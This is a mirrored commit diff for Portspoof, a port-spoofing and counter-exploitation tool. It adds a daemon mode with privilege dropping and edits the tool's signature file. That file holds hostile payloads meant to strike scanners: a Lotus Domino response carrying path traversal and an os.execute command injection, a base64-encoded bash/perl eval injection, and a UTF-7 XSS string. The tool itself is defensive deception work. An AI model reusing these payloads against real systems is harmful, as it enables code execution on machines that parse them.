mirror of
https://github.com/drk1wi/portspoof.git
synced 2024-07-01 03:01:43 +00:00
ready for release
This commit is contained in:
parent
1791fe4e2b
commit
9765f738db
@ -43,6 +43,9 @@ Configuration::Configuration()
|
||||
signaturefile = std::string(SIGNATURE_FILE);
|
||||
logfile = std::string(LOG_FILE);
|
||||
bind_ip=std::string();
|
||||
username=std::string(DAEMON_USER);
|
||||
group=std::string(DAEMON_USER);
|
||||
|
||||
port=DEFAULT_PORT;
|
||||
opts=0;
|
||||
nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);
|
||||
@ -63,6 +66,7 @@ void Configuration::usage(void)
|
||||
"Portspoof - service signature emulator / exploitation framework.\n\n"
|
||||
"-i ip : Bind to a particular IP address\n"
|
||||
"-p port : Bind to a particular PORT number\n"
|
||||
"-D run as daemon process\n"
|
||||
"-s file_path : Portspoof service signature regex. file\n"
|
||||
"-c file_path : Portspoof configuration file\n"
|
||||
"-l file_path : Log port scanning alerts to a file\n"
|
||||
@ -84,7 +88,7 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
int ch;
|
||||
extern char *__progname;
|
||||
|
||||
while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
|
||||
while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123D")) != -1) {
|
||||
switch (ch) {
|
||||
case 'i':
|
||||
this->bind_ip = std::string(optarg);
|
||||
@ -112,6 +116,9 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
this->opts[OPT_SYSLOG_DIS]=1;
|
||||
fprintf(stdout,"-> Syslog logging disabled.\n");
|
||||
break;
|
||||
case 'D':
|
||||
this->opts[OPT_RUN_AS_D]=1;
|
||||
break;
|
||||
case 'l':
|
||||
this->opts[OPT_LOG_FILE]=1;
|
||||
this->logfile = std::string(optarg);
|
||||
@ -214,10 +221,31 @@ unsigned short int Configuration::getPort()
|
||||
|
||||
int Configuration::getThreadNr()
|
||||
{
|
||||
|
||||
return this->thread_number;
|
||||
}
|
||||
|
||||
|
||||
int Configuration::getUserid()
|
||||
{
|
||||
struct passwd *pwd = getpwnam(this->username.c_str());
|
||||
if(pwd) return pwd->pw_uid;
|
||||
|
||||
return -1;
|
||||
}
|
||||
|
||||
|
||||
int Configuration::getGroupid()
|
||||
{
|
||||
struct group *grp = getgrnam(this->group.c_str());
|
||||
if(grp) return grp->gr_gid;
|
||||
|
||||
return -1;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
std::vector<char> Configuration::mapPort2Signature(unsigned short port)
|
||||
{
|
||||
|
||||
|
@ -44,6 +44,10 @@
|
||||
#define LOG_FILE "portspoof.log"
|
||||
#define CONF_FILE "portspoof.conf"
|
||||
#define SIGNATURE_FILE "portspoof_signatures"
|
||||
|
||||
#define DAEMON_USER "daemon"
|
||||
#define DAEMON_GROUP "daemon"
|
||||
|
||||
#define OPT_FUZZ_WORDLIST 1
|
||||
#define OPT_IP 2
|
||||
#define OPT_PORT 3
|
||||
@ -56,14 +60,14 @@
|
||||
#define OPT_FUZZ_INTERNAL 10
|
||||
#define OPT_NOT_NMAP_SCANNER 11
|
||||
#define OPT_FUZZ_RANDOM 12
|
||||
#define OPT_RUN_AS_D 13
|
||||
|
||||
|
||||
#define MAX_PORTS 65535
|
||||
|
||||
|
||||
#include <string>
|
||||
#include <stdio.h>
|
||||
#include <ctype.h>
|
||||
#include <pcap.h>
|
||||
#include <map>
|
||||
#include <vector>
|
||||
#include <sstream>
|
||||
@ -72,6 +76,11 @@
|
||||
#include <iostream>
|
||||
#include <ctime>
|
||||
#include <bitset>
|
||||
#include <sys/types.h>
|
||||
#include <stdio.h>
|
||||
#include <pwd.h>
|
||||
#include <grp.h>
|
||||
#include <unistd.h>
|
||||
|
||||
|
||||
#include "Utils.h"
|
||||
@ -98,6 +107,9 @@ class Configuration {
|
||||
std::string signaturefile;
|
||||
std::string logfile;
|
||||
std::string bind_ip;
|
||||
std::string username;
|
||||
std::string group;
|
||||
|
||||
unsigned short int port;
|
||||
int thread_number;
|
||||
bool fuzzing_mode;
|
||||
@ -127,7 +139,8 @@ class Configuration {
|
||||
bool getConfigValue(int value);
|
||||
unsigned short int getPort();
|
||||
int getThreadNr();
|
||||
|
||||
int getGroupid();
|
||||
int getUserid();
|
||||
};
|
||||
|
||||
|
||||
|
@ -42,7 +42,6 @@
|
||||
#include <string>
|
||||
#include <stdio.h>
|
||||
#include <ctype.h>
|
||||
#include <pcap.h>
|
||||
#include <map>
|
||||
#include <vector>
|
||||
#include <sstream>
|
||||
|
@ -174,3 +174,87 @@ int Server::choose_thread()
|
||||
|
||||
return min;
|
||||
}
|
||||
|
||||
|
||||
|
||||
void Server::daemonize()
|
||||
{
|
||||
|
||||
const string &dir = "/";
|
||||
const std::string &stdinfile = "/dev/null";
|
||||
const std::string &stdoutfile = "/dev/null";
|
||||
const std::string &stderrfile = "/dev/null";
|
||||
|
||||
|
||||
umask(0);
|
||||
/*
|
||||
rlimit rl;
|
||||
if (getrlimit(RLIMIT_NOFILE, &rl) < 0)
|
||||
{
|
||||
throw std::runtime_error(strerror(errno));
|
||||
}
|
||||
|
||||
|
||||
|
||||
*/
|
||||
|
||||
pid_t pid;
|
||||
if ((pid = fork()) < 0)
|
||||
{
|
||||
throw std::runtime_error(strerror(errno));
|
||||
} else if (pid != 0) { //parent
|
||||
exit(0);
|
||||
}
|
||||
|
||||
setsid();
|
||||
|
||||
if (!dir.empty() && chdir(dir.c_str()) < 0)
|
||||
{
|
||||
throw std::runtime_error(strerror(errno));
|
||||
}
|
||||
|
||||
|
||||
if (setgid(this->configuration->getGroupid()) != 0)
|
||||
{
|
||||
fprintf(stdout,"setgid: Unable to drop group privileges: %s", strerror(errno));
|
||||
fflush(stdout);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
||||
if (setuid(this->configuration->getUserid()) != 0)
|
||||
{
|
||||
fprintf(stdout,"setuid: Unable to drop user privileges: %s", strerror(errno));
|
||||
fflush(stdout);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
||||
/*
|
||||
if (rl.rlim_max == RLIM_INFINITY)
|
||||
{
|
||||
rl.rlim_max = 1024;
|
||||
}
|
||||
|
||||
for (unsigned int i = 0; i < rl.rlim_max; i++)
|
||||
{
|
||||
close(i);
|
||||
}
|
||||
|
||||
*/
|
||||
|
||||
int fd0 = open(stdinfile.c_str(), O_RDONLY);
|
||||
int fd1 = open(stdoutfile.c_str(),
|
||||
O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
|
||||
int fd2 = open(stderrfile.c_str(),
|
||||
O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
|
||||
|
||||
/*
|
||||
if (fd0 != STDIN_FILENO || fd1 != STDOUT_FILENO || fd2 != STDERR_FILENO)
|
||||
{
|
||||
throw runtime_error("new standard file descriptors were not opened as expected");
|
||||
}
|
||||
*/
|
||||
|
||||
|
||||
}
|
@ -42,6 +42,12 @@
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdio.h>
|
||||
#include <pwd.h>
|
||||
#include <unistd.h>
|
||||
#include <stdexcept>
|
||||
#include <sys/resource.h>
|
||||
|
||||
#include <time.h>
|
||||
#include "Threads.h"
|
||||
@ -66,6 +72,7 @@ class Server{
|
||||
Server(Configuration* configuration);
|
||||
int choose_thread();
|
||||
bool run();
|
||||
void daemonize();
|
||||
};
|
||||
|
||||
#endif
|
||||
|
@ -55,6 +55,10 @@ int main(int argc, char **argv)
|
||||
exit(1);
|
||||
|
||||
server = new Server(configuration);
|
||||
|
||||
if(configuration->getConfigValue(OPT_RUN_AS_D))
|
||||
server->daemonize();
|
||||
|
||||
server->run();
|
||||
|
||||
return 0;
|
||||
|
@ -33,6 +33,7 @@
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
// TODO: TO BE ENTIRELY REWRITTEN!
|
||||
|
||||
#include "revregex.h"
|
||||
|
||||
|
@ -1,13 +1,12 @@
|
||||
#!/bin/sh
|
||||
# Starts and stops Portspoof
|
||||
# Starts and stops Portspoof daemon
|
||||
#
|
||||
|
||||
|
||||
case "$1" in
|
||||
start)
|
||||
|
||||
if ! pidof portspoof >/dev/null; then
|
||||
/usr/local/bin/portspoof -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures
|
||||
/usr/local/bin/portspoof -D -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures
|
||||
echo "Starting Portspoof..."
|
||||
else
|
||||
echo "Portspoof already running.."
|
||||
|
@ -99,7 +99,7 @@
|
||||
80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22 value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"
|
||||
|
||||
#OS cmd injection payload for bash: $(cat output) and `cat output` injections
|
||||
9090 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV[0];~s/SPACE/\t/ig;eval;$_=$ARGV[1];eval(decode_base64($_));"
|
||||
8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"
|
||||
|
||||
#McAffe SuperScan UTF7 XSS payload
|
||||
1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"
|
||||
|
Loading…
Reference in New Issue
Block a user